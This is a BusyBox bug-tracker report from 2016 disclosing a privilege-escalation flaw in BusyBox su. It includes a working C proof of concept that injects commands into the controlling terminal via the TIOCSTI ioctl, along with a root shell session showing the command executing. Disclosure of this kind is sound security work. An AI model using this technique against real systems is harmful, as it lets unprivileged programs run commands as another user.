[Bug 9401] New: privilege escalation with TIOCSTI ioctl from busybox su
bugzilla at busybox.net
bugzilla at busybox.net
Wed Nov 2 01:18:30 UTC 2016
https://bugs.busybox.net/show_bug.cgi?id=9401
Bug ID: 9401
Summary: privilege escalation with TIOCSTI ioctl from busybox
su
Product: Busybox
Version: unspecified
Hardware: All
OS: Linux
Status: NEW
Severity: normal
Priority: P5
Component: Other
Assignee: unassigned at busybox.net
Reporter: _ at lizzie.io
CC: busybox-cvs at busybox.net
Target Milestone: ---
Created attachment 6796
--> https://bugs.busybox.net/attachment.cgi?id=6796&action=edit
use the TIOCSTI ioctl to write a command to the controlling tty
I noticed that Busybox su is vulnerable to tty hijacking with the
TIOCSTI ioctl. For example, this C program writes to the controlling
terminal and so can run arbitrary shell commands. With this, any
unprivileged program run with su can execute code as the calling user.
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>
int main()
{
for (char *cmd = "id\n"; *cmd; cmd++) {
if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
fprintf(stderr, "++ ioctl failed: %m\n");
return 1;
}
}
return 0;
}
[lizzie at empress misc]$ gcc -Wall -Werror tiocsti.c -o tiocsti
[lizzie at empress misc]$ sudo bash
[root at empress misc]# ./busybox su -v
su: invalid option -- 'v'
BusyBox v1.26.0.git (2016-10-25 17:15:49 PDT) multi-call binary.
Usage: su [OPTIONS] [-] [USER]
Run shell under USER (by default, root)
-,-l Clear environment, run shell as login shell
-p,-m Do not set new $HOME, $SHELL, $USER, $LOGNAME
-c CMD Command to pass to 'sh -c'
-s SH Shell to use instead of user's default
[root at empress misc]# ./busybox su lizzie -c ./tiocsti
id
[root at empress misc]# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
[root at empress misc]# ./busybox --version
Note that this was done without any user interaction beyond './busybox
su lizzie -c ./tiocsti'. Also worth noting that util-linux su prevents
this. (CVE-2005-4890 was a similar issue from 2005 in util-linux su).
[root at empress misc]# su --version
su from util-linux 2.28.2
[root at empress misc]# su lizzie -c tiocsti
bash: tiocsti: command not found
[root at empress misc]# su lizzie -c ./tiocsti
++ ioctl failed: Operation not permitted
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the busybox-cvs
mailing list